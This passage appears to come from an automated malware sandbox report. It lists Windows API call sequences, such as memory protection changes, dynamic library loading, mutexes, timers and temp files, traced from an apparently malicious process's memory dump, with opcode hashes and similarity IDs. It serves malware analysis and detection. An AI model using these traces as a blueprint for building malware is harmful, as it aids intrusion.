                                                            • String ID:
                                                            • API String ID: 796380773-0
                                                            • Opcode ID: 6d4abf98ba5671d0a2cfe3f21f619b483d1e3eef7539b5c118c55d6e3c7a9914
                                                            • Instruction ID: 122600637453218508ea620c15109abf589f3e2d31e4256ec0c66cd1fc744264
                                                            • Opcode Fuzzy Hash: 6d4abf98ba5671d0a2cfe3f21f619b483d1e3eef7539b5c118c55d6e3c7a9914
                                                            • Instruction Fuzzy Hash: EB513A71A04209AFDB10DFA5D8C5EAE7BB8EB08304F0540AAE609E7251E774BE55CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5B0
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5C1
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5D3
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5E5
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF5F7
                                                            • lstrlenW.KERNEL32(?,04BC522F,05C899A0,00000057), ref: 04BBF603
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID:
                                                            • API String ID: 1659193697-0
                                                            • Opcode ID: 2731a6b22c4576eac3ed087c75e80842f3681346970613c351e5e90b451e9752
                                                            • Instruction ID: 8c475055dab3db8185a3bffc906cb7c0a06c93a3829bebb65e9a16b4c19027c7
                                                            • Opcode Fuzzy Hash: 2731a6b22c4576eac3ed087c75e80842f3681346970613c351e5e90b451e9752
                                                            • Instruction Fuzzy Hash: 0941EF71E00209AFDB14DFA9CC80ABEB7F9FF58204B14C5ADD596E3211E7B4E9458B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BA5D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04BB4F14,00000000,00000000,00000000,?,04BB1CF2,00000000,00000000,00000000,00000000), ref: 04BA5D17
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BA24F8
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BA250B
                                                            • RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BA251C
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BA2531
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BA2569
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 2349942465-0
                                                            • Opcode ID: 53698b27ad725862426bc2d55182dd14fa7034e071efe41f144dc8d170bc240c
                                                            • Instruction ID: f08d5185d75642efd540f92391c8f1fe4af6314f9005f70dea495e6e31518359
                                                            • Opcode Fuzzy Hash: 53698b27ad725862426bc2d55182dd14fa7034e071efe41f144dc8d170bc240c
                                                            • Instruction Fuzzy Hash: 62318EFB919142AFD3010B24ACC89DDFBE1EFB9226B1540DDE1645B106D13D789B8BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04BB8D4F: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 04BB8D5B
  • Part of subcall function 04BB8D4F: SetLastError.KERNEL32(000000B7,?,04BB879F,?,?,00000000,?,?,?), ref: 04BB8D6C
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04BB87BF
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04BB8897
  • Part of subcall function 04BACDCB: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04BACDE5
  • Part of subcall function 04BACDCB: CreateWaitableTimerA.KERNEL32(04BCC1A8,00000001,?), ref: 04BACE02
  • Part of subcall function 04BACDCB: GetLastError.KERNEL32(?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE13
  • Part of subcall function 04BACDCB: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE53
  • Part of subcall function 04BACDCB: SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE72
  • Part of subcall function 04BACDCB: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE88
• GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04BB8880
• ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04BB8889
  • Part of subcall function 04BB8D4F: CreateMutexA.KERNEL32(04BCC1A8,00000000,?,?,04BB879F,?,?,00000000,?,?,?), ref: 04BB8D7F
• GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 04BB88A4
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
• String ID:
• API String ID: 1700416623-0
• Opcode ID: 674aaa340e9469b79e07ac2203abbcdc298773d65b55089cbb9c5d92c925697b
• Instruction ID: 7c68b562491c9125ae014a68fb55747b6a5b3e4a241d863e33a49bb8f6889f5d
• Opcode Fuzzy Hash: 674aaa340e9469b79e07ac2203abbcdc298773d65b55089cbb9c5d92c925697b
• Instruction Fuzzy Hash: 37318071A00204AFCB10AF75ECC48BA7FBEEB9835471405A7E885D7290DA74AC01DBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00000007), ref: 04BBD702
• lstrcpy.KERNEL32(00000000,?), ref: 04BBD71B
• lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 04BBD728
• lstrlen.KERNEL32(04BCD3A4,?,?,?,?,?,00000000,00000000,?), ref: 04BBD73A
• HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 04BBD76B
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
• String ID:
• API String ID: 2734445380-0
• Opcode ID: 20ecad689beb397475f314246f658416c0ead5102a7fdcf98be1385fadacaacd
• Instruction ID: 531f530e376e7f2efbd00ffea6d883956bbe7fd860ff93ce80324f9c50054b1f
• Opcode Fuzzy Hash: 20ecad689beb397475f314246f658416c0ead5102a7fdcf98be1385fadacaacd
• Instruction Fuzzy Hash: BE316F75500209BFDB11DF95DC88EEE7BB8EF49310F148469FC1592200DB78EA15DBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04BA5D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04BB4F14,00000000,00000000,00000000,?,04BB1CF2,00000000,00000000,00000000,00000000), ref: 04BA5D17
• RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BBD552
• RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BBD565
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BBD576
• RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04BBD5E1
• InterlockedIncrement.KERNEL32(04BCC33C), ref: 04BBD5F8
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
• String ID:
• API String ID: 3915436794-0
• Opcode ID: 56bcaf9397dfa709caea6fb428e3e50a0d332e1b1c3df94bd6c37cadcd845c77
• Instruction ID: 69281128d73a41fec1e9d4e384730c3582e0dc0a1577d124ff28818d2abcefd3
• Opcode Fuzzy Hash: 56bcaf9397dfa709caea6fb428e3e50a0d332e1b1c3df94bd6c37cadcd845c77
• Instruction Fuzzy Hash: 2F31A0326047069FDB21CF28D8C496ABBB9FB98325B00455EF89A83250D779FC11CBE1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(?,?,00000000,00000000,04BB228F,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BBD9CF
• LoadLibraryA.KERNEL32(?), ref: 04BBD9E4
• LoadLibraryA.KERNEL32(?), ref: 04BBDA00
• GetProcAddress.KERNEL32(00000000,?), ref: 04BBDA15
• GetProcAddress.KERNEL32(00000000,?), ref: 04BBDA29
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: LibraryLoad$AddressProc
• String ID:
• API String ID: 1469910268-0
• Opcode ID: 1380cd67ae06ba3156868d683b627fb4bf49a7d61fd9c536e726ad0612e8204e
• Instruction ID: 60e702900f218dba3dab5d57ebfc7bdac448d36ba45d952589cf55333a463ddd
• Opcode Fuzzy Hash: 1380cd67ae06ba3156868d683b627fb4bf49a7d61fd9c536e726ad0612e8204e
• Instruction Fuzzy Hash: 52316976A442058FCB00CF68E8D1AA57BF8FB5D714B09429BE648D7311D778FC068B64
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
  • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
  • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
  • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
  • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
  • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
• DeleteFileA.KERNEL32(00000000,000004D2), ref: 04BAA4C4
• CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04BAA4CD
• GetLastError.KERNEL32 ref: 04BAA4D7
• HeapFree.KERNEL32(00000000,00000000), ref: 04BAA596
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
• String ID:
• API String ID: 3543646443-0
• Opcode ID: 39f6acf9ed87932783a0a8ecca805bd452e8a5596a71cc4e562608799cee3b19
• Instruction ID: 0163621becc45f27d86c63d625f1b8b090d2a596340b204df9b3ab5dab071b89
• Opcode Fuzzy Hash: 39f6acf9ed87932783a0a8ecca805bd452e8a5596a71cc4e562608799cee3b19
• Instruction Fuzzy Hash: 6A21B5B2545114ABD320BBA5ECC8DDA3BADEF4D204F094062B704C7145D668FA14C7B0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04BB81D1: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BB2283,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB81DD
  • Part of subcall function 04BB81D1: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04BB81F3
  • Part of subcall function 04BB81D1: _snwprintf.NTDLL ref: 04BB8218
  • Part of subcall function 04BB81D1: CreateFileMappingW.KERNEL32(000000FF,04BCC1A8,00000004,00000000,00001000,?), ref: 04BB8234
  • Part of subcall function 04BB81D1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BB8246
  • Part of subcall function 04BB81D1: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04BB827E
• UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BB2283,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BAD9EE
• CloseHandle.KERNEL32(?), ref: 04BAD9F7
• SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BB2283,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BADA3E
• GetLastError.KERNEL32(04BAA8B7,00000000,00000000), ref: 04BADA6D
• CloseHandle.KERNEL32(00000000,04BAA8B7,00000000,00000000), ref: 04BADA7D
  • Part of subcall function 04BAA20E: lstrlenW.KERNEL32(?,?,00000000,73B74D40,?,?,04BC1C44,?,73B74D40), ref: 04BAA21A
  • Part of subcall function 04BAA20E: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,04BC1C44,?,73B74D40), ref: 04BAA242
  • Part of subcall function 04BAA20E: memset.NTDLL ref: 04BAA254
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
• String ID:
• API String ID: 1106445334-0
• Opcode ID: 9e637b4236c787cf81c990ba2e22906fa971d5bf3e95b402fcc74c51c480f677
• Instruction ID: e919153d575ff68a4a246e300a2bc6ac000e3faff9861fab8cfb9fd739544ff5
• Opcode Fuzzy Hash: 9e637b4236c787cf81c990ba2e22906fa971d5bf3e95b402fcc74c51c480f677
• Instruction Fuzzy Hash: 05215075648204AFEB10EFB5DC81B9A7BADEB58714B0004AAE646E7550EB74FC128B70
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04BB5A38,00000000,?,?), ref: 04BB5F1A
• GetFileSize.KERNEL32(00000000,00000000,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?), ref: 04BB5F2A
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF), ref: 04BB5F56
• GetLastError.KERNEL32(?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?,00000000,?), ref: 04BB5F7B
• CloseHandle.KERNEL32(000000FF,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?,00000000), ref: 04BB5F8C
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: File$CloseCreateErrorHandleLastReadSize
• String ID:
• API String ID: 3577853679-0
• Opcode ID: e5ebb8681514f43f68756fb8571076b5937b9f62556b8961bfae32838f0b0563
• Instruction ID: 95a66a152498373d10e8d1b1fdf353194e0aa0f472271206a30a08deee51dcad
• Opcode Fuzzy Hash: e5ebb8681514f43f68756fb8571076b5937b9f62556b8961bfae32838f0b0563
• Instruction Fuzzy Hash: 5811AF72200214BFDB315F64CCC4EFEBBADEB053A8F4141A6F995A7190D6B0AD4186E2
Uniqueness
• Uniqueness Score: -1.00%

APIs
• StrChrA.SHLWAPI(?,0000002C), ref: 04BB6E63
• StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 04BB6E7C
• StrTrimA.SHLWAPI(?,?), ref: 04BB6EA4
• StrTrimA.SHLWAPI(00000000,?), ref: 04BB6EB3
• HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 04BB6EEA
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: Trim$FreeHeap
• String ID:
• API String ID: 2132463267-0
• Opcode ID: 02192f8173d9d39e06e750c15b773360eb7f83b81f87043bd93792fa58828ce3
• Instruction ID: 698e5b35b436340149640c5d2046340a81d45e3476a8154e4e747e36d5a7543e
• Opcode Fuzzy Hash: 02192f8173d9d39e06e750c15b773360eb7f83b81f87043bd93792fa58828ce3
• Instruction Fuzzy Hash: DA118676600209BBE7219A69DCC5FEF7BACEB48750F140462BA08DB141DBB4FD0187E1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,010BB5A8,00000000,04BA1C48,?,?,?,04BACC9A,73B75520,?,04BB070F,00000000,00000000), ref: 04BB75A4
• VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,04BACC9A,73B75520,?,04BB070F,00000000,00000000,?,00000000,04BA1C48,00000000), ref: 04BB75D4
• RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BB75E3
• RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BB7601
• GetLastError.KERNEL32(?,04BACC9A,73B75520,?,04BB070F,00000000,00000000,?,00000000,04BA1C48,00000000), ref: 04BB7611
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
• String ID:
• API String ID: 653387826-0
• Opcode ID: c6bd19a574005556e042ba21f85216fba1dacf92964be83ed0f68b919888edb7
• Instruction ID: fb074f8deebfb02a4ec13751656b7d08c85ade901d5152d1c2eb663884f21d70
• Opcode Fuzzy Hash: c6bd19a574005556e042ba21f85216fba1dacf92964be83ed0f68b919888edb7
• Instruction Fuzzy Hash: C721D8B5600B05AFD711DFA9D9C499ABBF8FB08304B00456AEA5AE7710D7B4FD14CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 04BA912E
• GetLastError.KERNEL32 ref: 04BA9151
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 04BA9164
• GetLastError.KERNEL32 ref: 04BA916F
• HeapFree.KERNEL32(00000000,00000000), ref: 04BA91B7
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
• String ID:
• API String ID: 1671499436-0
• Opcode ID: b2219811a7c46c3443f9319c580143ce95c22be1d397acb0ee49088d9ad020fc
• Instruction ID: 779c24c0ba03fc12bbf3fef402842fcae08c98a8c39d2c5421b9428032250d29
• Opcode Fuzzy Hash: b2219811a7c46c3443f9319c580143ce95c22be1d397acb0ee49088d9ad020fc
• Instruction Fuzzy Hash: 0D218EB0508204FBEB208F65DCCDF5E7BB9EB44319F6008A9E142965A0D375ADA0EB20
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(04BA8E44,?,?,?,?,00000008,04BA8E44,00000000,?,?,04BAEE33,?,?,00000000,04BB227C,00000000), ref: 04BBED2B
• memcpy.NTDLL(04BA8E44,?,00000009,?,?,?,?,00000008,04BA8E44,00000000,?,?,04BAEE33,?,?,00000000), ref: 04BBED4D
• RtlAllocateHeap.NTDLL(00000000,00000013), ref: 04BBED65
• lstrlenW.KERNEL32(00000000,00000001,04BA8E44,?,?,?,?,?,?,?,00000008,04BA8E44,00000000,?,?,04BAEE33), ref: 04BBED85
• HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,04BA8E44,00000000,?), ref: 04BBEDAA
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
• String ID:
• API String ID: 3065863707-0
• Opcode ID: 43f5366266dc532285f4631656c8fb32f384e7355c11737e522b6f6670fa3897
• Instruction ID: dae5f77334a4831658177ede76b9aea79a965c3d87e3ac626f2c2c9226c854db
• Opcode Fuzzy Hash: 43f5366266dc532285f4631656c8fb32f384e7355c11737e522b6f6670fa3897
• Instruction Fuzzy Hash: 1D115135D04208FBDB119BA5D889FDE7BB8EB0C711F044452F955E7280D674EA48DB70
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrcmpi.KERNEL32(00000000,?), ref: 04BBB8C4
• RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BBB8D1
• RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BBB8E4
• lstrcmpi.KERNEL32(04BCC340,00000000), ref: 04BBB904
• GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BA447E,00000000), ref: 04BBB918
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
• String ID:
• API String ID: 1266740956-0
• Opcode ID: 047f363289d03b72b2d067671c0abb997d9e7c27a2d4f7583fc1fe0eb2480067
• Instruction ID: 6f27af644eab7a207f211156de13465c39322ab1b57197dca702b188aecf61d2
• Opcode Fuzzy Hash: 047f363289d03b72b2d067671c0abb997d9e7c27a2d4f7583fc1fe0eb2480067
• Instruction Fuzzy Hash: 42114F32904209AFDB24CF59D8C9EA9BBB8FB58325F05419AE489D3251D778FD058BE0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04BA9999,00000000,?,00000000,73B75520,00000000,?,04BB7991,?,?,?,00000000), ref: 04BB544A
  • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
• lstrcpy.KERNEL32(00000000,00000000), ref: 04BB546E
• StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04BB7991,?,?,?,00000000,?,00000000,00000000), ref: 04BB5475
• lstrcpy.KERNEL32(00000000,?), ref: 04BB54BD
• lstrcat.KERNEL32(00000000,?), ref: 04BB54CC
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: lstrcpy$AllocateHeaplstrcatlstrlen
• String ID:
• API String ID: 2616531654-0
• Opcode ID: e5823f1c470c827a41213fba39abc0d150d75c064b155dbbd3ea950323158e5b
• Instruction ID: a15e011f5d33c8b724a2a5efadc1114dc581e2cd4e81587916d67a1d589457e4
• Opcode Fuzzy Hash: e5823f1c470c827a41213fba39abc0d150d75c064b155dbbd3ea950323158e5b
• Instruction Fuzzy Hash: 03119172204215BBD3309A69D8C8EBB77ECEB88705F058069F645D3144DB68EC15C772
Uniqueness
• Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BA5D0B: lstrlen.KERNEL32(00000000,00000000,?,00000000,04BB4F14,00000000,00000000,00000000,?,04BB1CF2,00000000,00000000,00000000,00000000), ref: 04BA5D17
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BA24F8
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BA250B
                                                            • RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BA251C
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BA2531
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BA2569
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 2349942465-0
                                                            • Opcode ID: a6dfd1954c7e80b549dc8a0c0ee7b0d25b3ff3d66b2658ef5b07f963d349e789
                                                            • Instruction ID: 8266cc7cea984c2f03c84e203cb694c0c657be8551aec7456e1b923d42d8d0ae
                                                            • Opcode Fuzzy Hash: a6dfd1954c7e80b549dc8a0c0ee7b0d25b3ff3d66b2658ef5b07f963d349e789
                                                            • Instruction Fuzzy Hash: D711C676508210AFD7255F28ECC4D2A7BA8FB8D22270105AEF81693240D639BC158BB1
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,04BA23D0,?,?,00000000), ref: 04BBD4AC
                                                            • lstrlen.KERNEL32(?,?,?,?,04BA23D0,?,?,00000000), ref: 04BBD4B3
                                                            • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 04BBD4C1
                                                              • Part of subcall function 04BBF3A1: GetLocalTime.KERNEL32(00000000,00000000), ref: 04BBF3AB
                                                              • Part of subcall function 04BBF3A1: wsprintfA.USER32 ref: 04BBF3DE
                                                            • wsprintfA.USER32 ref: 04BBD4E3
                                                              • Part of subcall function 04BBA8BA: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,04BBD50B,00000000,?,00000000,00000000,00000006,00000000), ref: 04BBA8D8
                                                              • Part of subcall function 04BBA8BA: wsprintfA.USER32 ref: 04BBA8FD
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,00000000), ref: 04BBD514
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                            • String ID:
                                                            • API String ID: 3847261958-0
                                                            • Opcode ID: 414adc2f68b5607cf6a3a5a0a12b726e150b8d3481fe926325ca6d2191cc134d
                                                            • Instruction ID: 986e28cd051aca7ab8bf9a1d47335e45a561bf630582febc06d2ae88cc564861
                                                            • Opcode Fuzzy Hash: 414adc2f68b5607cf6a3a5a0a12b726e150b8d3481fe926325ca6d2191cc134d
                                                            • Instruction Fuzzy Hash: 6F01A172100218BBDB112F26DC84EAF7F6DFB88364B008022FD1897211D67AAD61DFB0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BACD69
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BACD7A
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,04BC02E6,04BCB7A0,-0000000C,00000000,04BBC508,0000000C,00000000,?,0000000C,00000000), ref: 04BACD91
                                                            • VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,04BC02E6,04BCB7A0,-0000000C,00000000,04BBC508,0000000C,00000000,?,0000000C,00000000), ref: 04BACDAB
                                                            • GetLastError.KERNEL32(?,?,04BC02E6,04BCB7A0,-0000000C,00000000,04BBC508,0000000C,00000000,?,0000000C,00000000,?), ref: 04BACDB8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 653387826-0
                                                            • Opcode ID: 1fd805322dd75b908199268a6ef9e8b3c194068c307cc8cbf0c1f7633071e578
                                                            • Instruction ID: 0c9592d42f735eebdef7cdd97f6543c3f22dc31a0d052fa10a887a116833fb5e
                                                            • Opcode Fuzzy Hash: 1fd805322dd75b908199268a6ef9e8b3c194068c307cc8cbf0c1f7633071e578
                                                            • Instruction Fuzzy Hash: 1301A276200704EFD7209F25DC80E6ABBF9FF88721B104159EA46A3350D730FD019B20
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BA38A7
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 04BA38B7
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 04BA38C0
                                                            • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,04BB67F1,?,?,00000040), ref: 04BA38DE
                                                            • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,04BB67F1,?,?,00000040), ref: 04BA38EB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 3667519916-0
                                                            • Opcode ID: db73df254d80d6c374bee4fa70419114bfe9bbbdc150c7146e9c7f971f20e565
                                                            • Instruction ID: 154fa39a7993e1b757f17eebd6f62481ba80c2a1e6d0b2d40bcbf1e8ad966863
                                                            • Opcode Fuzzy Hash: db73df254d80d6c374bee4fa70419114bfe9bbbdc150c7146e9c7f971f20e565
                                                            • Instruction Fuzzy Hash: 96F03A70204700AFEA206B35DC88F2BB3E9FF48711F145669F941A2590CB28FC69CA21
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04BA136B,?), ref: 04BA2738
                                                            • GetVersion.KERNEL32 ref: 04BA2747
                                                            • GetCurrentProcessId.KERNEL32 ref: 04BA2756
